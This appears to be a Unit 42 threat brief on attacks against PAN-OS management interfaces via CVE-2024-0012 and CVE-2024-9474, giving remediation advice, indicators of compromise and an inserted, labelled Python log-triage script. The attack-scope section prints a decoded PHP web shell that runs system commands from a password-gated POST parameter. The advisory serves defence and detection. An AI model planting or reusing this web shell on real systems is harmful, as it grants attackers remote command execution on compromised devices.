# Threat Brief: Operation Lunar Peek, Activity Related to CVE-2024-0012 and CVE-2024-9474 (Updated Nov. 22)

* By: [Unit 42](https://unit42.paloaltonetworks.com/author/unit42/)
* Published: November 22, 2024
* Related Products: Unit 42 Incident Response
* Categories: [High Profile Threats](https://unit42.paloaltonetworks.com/category/top-cyberthreats/), [Vulnerabilities](https://unit42.paloaltonetworks.com/category/vulnerabilities/)
* Tags: [CVE-2024-0012](https://unit42.paloaltonetworks.com/tag/cve-2024-0012/), [CVE-2024-9474](https://unit42.paloaltonetworks.com/tag/cve-2024-9474/), [Operation Lunar Peek](https://unit42.paloaltonetworks.com/tag/operation-lunar-peek/), [PAN-OS](https://unit42.paloaltonetworks.com/tag/pan-os/)

## Executive Summary

Palo Alto Networks and Unit 42 continue to track exploitation activity related to CVE-2024-0012 and CVE-2024-9474. We are working with external researchers, partners and customers to share information transparently and rapidly.

**Fixes for both vulnerabilities are available.**
Please refer to the Palo Alto Networks Security Advisories ([CVE-2024-0012](https://security.paloaltonetworks.com/CVE-2024-0012), [CVE-2024-9474](https://security.paloaltonetworks.com/CVE-2024-9474)) for additional details about recommended solutions and affected products.

An authentication bypass in Palo Alto Networks PAN-OS software ([CVE-2024-0012](https://security.paloaltonetworks.com/CVE-2024-0012)) enables an unauthenticated attacker with network access to the management interface to gain PAN-OS administrator privileges. This could allow an adversary to perform administrative actions, tamper with the configuration or exploit other authenticated privilege escalation vulnerabilities like [CVE-2024-9474](https://security.paloaltonetworks.com/CVE-2024-9474).

**The risk of these issues is greatly reduced if you secure access to the management web interface by restricting access to only trusted internal IP addresses** according to our recommended [best practice deployment guidelines](https://live.paloaltonetworks.com/t5/community-blogs/tips-amp-tricks-how-to-secure-the-management-access-of-your-palo/ba-p/464431).

Palo Alto Networks has actively monitored and worked with customers to identify and further minimize the very small number of PAN-OS devices with management web interfaces exposed to the internet or other untrusted networks.

Palo Alto Networks originally identified threat activity potentially exploiting CVE-2024-0012 and CVE-2024-9474 against a limited number of management web interfaces. Palo Alto Networks continues to track additional threat activity following the public release of technical insights and artifacts by third-party researchers beginning on Nov. 19, 2024. The [Current Scope of the Attack](#post-137539-_50343o6a6han) section includes more information about the observed activity.

Information about observed indicators and surrounding context is available in the [Indicators of Compromise](#post-137539-_ydqdbjg0dngh) section, while a more complete list of IOCs is available at the [Unit42-Timely-Threat-Intel GitHub](https://github.com/PaloAltoNetworks/Unit42-Threat-Intelligence-Article-Information/blob/main/2024-November-IOC-updates-OperationLunarPeek.txt).

We are tracking the initial exploitation of this vulnerability under the name **Operation Lunar Peek**.

If you haven't already, **Palo Alto Networks also strongly recommends that customers secure access to your management interface according to our recommended [best practice deployment guidelines](https://live.paloaltonetworks.com/t5/community-blogs/tips-amp-tricks-how-to-secure-the-management-access-of-your-palo/ba-p/464431)**. Specifically, you should restrict access to the management interface to only trusted internal IP addresses to prevent external access from the internet. The vast majority of firewalls already follow Palo Alto Networks and industry best practices.

Please refer to the Palo Alto Networks Security Advisories ([CVE-2024-0012](https://security.paloaltonetworks.com/CVE-2024-0012), [CVE-2024-9474](https://security.paloaltonetworks.com/CVE-2024-9474)) for up-to-date information about affected products and versions, as well as more remediation guidance.

For assistance related to a potential compromise, please reach out to [Palo Alto Networks support](https://support.paloaltonetworks.com/).
Unit 42 Retainer customers can reach out to Unit 42 directly.

**Vulnerabilities Discussed:** [**CVE-2024-0012**](https://unit42.paloaltonetworks.com/tag/cve-2024-0012/), [**CVE-2024-9474**](https://unit42.paloaltonetworks.com/tag/cve-2024-9474/)

## Details of the CVE-2024-0012 and CVE-2024-9474 Vulnerabilities

An authentication bypass in Palo Alto Networks PAN-OS software ([CVE-2024-0012](https://security.paloaltonetworks.com/CVE-2024-0012)) enables an unauthenticated attacker with network access to the management interface to gain PAN-OS administrator privileges. This could allow an adversary to perform administrative actions, tamper with the configuration or exploit other authenticated privilege escalation vulnerabilities like [CVE-2024-9474](https://security.paloaltonetworks.com/CVE-2024-9474).

**The risk of these issues is greatly reduced if you secure access to the management web interface by restricting access to only trusted internal IP addresses** according to our recommended [best practice deployment guidelines](https://live.paloaltonetworks.com/t5/community-blogs/tips-amp-tricks-how-to-secure-the-management-access-of-your-palo/ba-p/464431).

Please refer to the Palo Alto Networks Security Advisories ([CVE-2024-0012](https://security.paloaltonetworks.com/CVE-2024-0012), [CVE-2024-9474](https://security.paloaltonetworks.com/CVE-2024-9474)) for up-to-date information about affected products and versions, as well as more remediation guidance.

## Current Scope of the Attack

Palo Alto Networks originally identified threat activity targeting a limited number of device management web interfaces. This original activity, reported on Nov. 18, 2024, primarily originated from IP addresses known to proxy/tunnel traffic for anonymous VPN services.

Unit 42 is actively clustering and characterizing this originally observed threat activity.
Originally observed post-exploitation activity included interactive command execution and dropping malware, such as web shells, on the firewall.

Web shell payloads recovered from compromised firewalls were obfuscated. One decoded payload sample (SHA256: 3C5F9034C86CB1952AA5BB07B4F77CE7D8BB5CC9FE5C029A32C72ADC7E814668) is presented below:

```php
<?php $z='system'; if(${'_POST'}['b']=='iUqPd') { $z(${'_POST'}['x']); };
```

The below user-agent string has been observed during multiple actor exploit attempts:

```
User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv 11.0) like Gecko
```

Unit 42 recommends **monitoring for and investigating any suspicious or otherwise abnormal activity on devices with a management web interface exposed to the internet**, as exact post-compromise activity and payloads may vary.

Palo Alto Networks is still actively investigating and remediating all identified threat activity. Palo Alto Networks observed a notable increase in threat activity following the public release of technical insights and artifacts by third-party researchers beginning on Nov. 19, 2024. At this time, **Unit 42 assesses with high confidence that a functional exploit chaining CVE-2024-0012 and CVE-2024-9474 is publicly available, which will enable broader threat activity**.

Unit 42 continues to also observe **both manual and automated scanning activity** aligning with the timeline of third-party artifacts becoming widely available.
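A defender-side triage script for the monitoring recommendation above and for the indicators this brief publishes, added here as an example (not code from Unit 42 or from this brief): it parses access-log lines, flags requests carrying the published user-agent string, and flags management-interface requests from sources outside a trusted internal range. The log format, the trusted networks and the sample lines are assumptions constructed for the example.

```python
import ipaddress
import re
from collections import Counter

# User-agent string this brief reports as seen in multiple exploit attempts.
LUNAR_PEEK_UA = "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv 11.0) like Gecko"

# Assumption: only these ranges may reach the management interface (a stand-in
# for an organisation's own trusted internal IP list, not a value from the brief).
TRUSTED_MGMT_NETS = [ipaddress.ip_network("10.0.0.0/8"),
                     ipaddress.ip_network("192.168.0.0/16")]

# Parser for a generic combined-format access line (constructed format for this
# example, not the PAN-OS log schema).
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"\s*$')

def review_line(line):
    """Return a finding for one log line, or None if it raises no signal."""
    m = LOG_RE.match(line)
    if not m:
        return None  # unparsable line: nothing to assess
    src = ipaddress.ip_address(m["src"])
    reasons = []
    if m["ua"] == LUNAR_PEEK_UA:
        reasons.append("ua-match")
    if not any(src in net for net in TRUSTED_MGMT_NETS):
        reasons.append("untrusted-source")
    if not reasons:
        return None
    return {"src": str(src), "ts": m["ts"], "method": m["method"],
            "path": m["path"], "reasons": reasons}

def review_log(text):
    """Run review_line over every line and keep only the findings."""
    return [f for f in map(review_line, text.splitlines()) if f]

def by_source(findings):
    """Count findings per source IP so high-volume (scanning) sources surface first."""
    return Counter(f["src"] for f in findings)

# Constructed sample lines (RFC 5737 documentation addresses); not real telemetry.
SAMPLE_LOG = """\
203.0.113.45 - - [19/Nov/2024:10:02:11 +0000] "GET /login HTTP/1.1" 200 512 "-" "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv 11.0) like Gecko"
203.0.113.45 - - [19/Nov/2024:10:02:13 +0000] "POST /login HTTP/1.1" 302 0 "-" "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv 11.0) like Gecko"
10.1.2.3 - - [19/Nov/2024:10:05:40 +0000] "GET /login HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/131.0"
198.51.100.7 - - [19/Nov/2024:10:06:02 +0000] "GET /login HTTP/1.1" 200 512 "-" "python-requests/2.32.3"
"""

if __name__ == "__main__":
    hits = review_log(SAMPLE_LOG)
    for h in hits:
        print(h["ts"], h["src"], h["method"], h["path"], ",".join(h["reasons"]))
    print(by_source(hits).most_common())
```

A user-agent match alone is a weak signal on its own, so the per-source count is what distinguishes a single stray request from the manual and automated scanning the brief describes.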
In agreement with [third-party reporting](https://arcticwolf.com/resources/blog/arctic-wolf-observes-threat-campaign-targeting-palo-alto-networks-firewall-devices/), Unit 42 has also observed increased diversity of post-compromise activity to include additional payloads such as open-source C2 tools as well as crypto miners.

A list of IP addresses and surrounding context are available in [Indicators of Compromise](#post-137539-_ydqdbjg0dngh), while a more complete list of IOCs is available at the [Unit42-Timely-Threat-Intel GitHub](https://github.com/PaloAltoNetworks/Unit42-Threat-Intelligence-Article-Information/blob/main/2024-November-IOC-updates-OperationLunarPeek.txt).

Unit 42 will continue to update this additional information as relevant data is available and sharable.

## Remediation Guidance

Palo Alto Networks recommends that customers update to receive the latest patches that fix CVE-2024-0012 and CVE-2024-9474. Please refer to the Palo Alto Networks Security Advisories ([CVE-2024-0012](https://security.paloaltonetworks.com/CVE-2024-0012), [CVE-2024-9474](https://security.paloaltonetworks.com/CVE-2024-9474)) for up-to-date information about affected products and versions.

If you haven't already, **Palo Alto Networks also strongly recommends that customers secure access to your management interface according to our recommended best practice deployment guidelines**. Specifically, you should restrict access to the management interface to only trusted internal IP addresses to prevent external access from the internet. The vast majority of firewalls already follow Palo Alto Networks and industry best practices.

## Conclusion

Palo Alto Networks has shared our findings with our fellow Cyber Threat Alliance (CTA) members. CTA members use this intelligence to rapidly deploy protections to their customers and to systematically disrupt malicious cyber actors.
Learn more about the [Cyber Threat Alliance](https://www.cyberthreatalliance.org/).

Palo Alto Networks customers are better protected by our products, as listed below. We will update this threat brief as more relevant information becomes available.

## Palo Alto Networks Product Protections for CVE-2024-0012 and CVE-2024-9474

Palo Alto Networks customers can leverage a variety of product protections and updates to identify and defend against this threat.

For assistance related to a potential compromise, please reach out to [Palo Alto Networks support](https://support.paloaltonetworks.com/). Unit 42 Retainer customers can reach out to the [Unit 42 Incident Response team](https://start.paloaltonetworks.com/contact-unit42.html) or call:

* North America Toll-Free: 866.486.4842 (866.4.UNIT42)
* EMEA: +31.20.299.3130
* APAC: +65.6983.8730
* Japan: +81.50.1790.0200

## Indicators of Compromise

### Command and Control Infrastructure

An increasingly high volume of threat actor IP addresses have been identified attempting to scan and/or connect to management web interfaces to exploit CVE-2024-0012 and CVE-2024-9474.

Many of these IP addresses have been known to proxy/tunnel traffic for anonymous VPN services, which may include legitimate user activity originating from these IPs to other destinations.

Unit 42 has also observed both manual and automated scanning originating from various IP addresses. This activity has greatly increased in volume and scope following the public release of technical insights and artifacts by third-party researchers beginning on Nov. 19, 2024.

A more complete list of observed IP addresses is available at the [Unit42-Timely-Threat-Intel GitHub](https://github.com/PaloAltoNetworks/Unit42-Threat-Intelligence-Article-Information/blob/main/2024-November-IOC-updates-OperationLunarPeek.txt).
Unit 42 will continue to update relevant values as additional information is available and sharable.

### Post-Exploitation Artifacts

| Indicator | Context |
|---|---|
| SHA256: 3C5F9034C86CB1952AA5BB07B4F77CE7D8BB5CC9FE5C029A32C72ADC7E814668 | PHP web shell payload dropped on a compromised firewall. A decoded view of this payload is available in the Current Scope of the Attack section. |
| User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv 11.0) like Gecko | User-agent string observed during multiple actor exploit attempts. |

## Additional Resources

* [CVE-2024-0012 PAN-OS: Authentication Bypass in the Management Web Interface (PAN-SA-2024-0015)](https://security.paloaltonetworks.com/CVE-2024-0012) — Palo Alto Networks Security Advisories
* [CVE-2024-9474 PAN-OS: Privilege Escalation (PE) Vulnerability in the Web Management Interface](https://security.paloaltonetworks.com/CVE-2024-9474) — Palo Alto Networks Security Advisories
* [Tips & Tricks: How to Secure the Management Access of Your Palo Alto Networks Device](https://live.paloaltonetworks.com/t5/community-blogs/tips-amp-tricks-how-to-secure-the-management-access-of-your-palo/ba-p/464431) — LIVEcommunity, Palo Alto Networks

*Updated Nov. 19, 2024 at 3:00 P.M. PST to add clarifying language to the Executive Summary, expand the Current Scope of the Attack section, and add new IoCs.*

*Updated Nov. 20, 2024 at 3:25 P.M. PST to make additions to the Executive Summary, the Current Scope of the Attack section, and to add new IoCs.*

*Updated Nov. 21, 2024 at 3:24 P.M. PST to add user-agent string to Scope of the Attack section and Artifacts subsection in IoCs section. Additional IoCs were added to GitHub and users redirected there. Edited for consistency and clarity.*

*Updated Nov. 22, 2024 at 3:05 P.M. PST to add additional detail on the diversity of post-compromise activity.*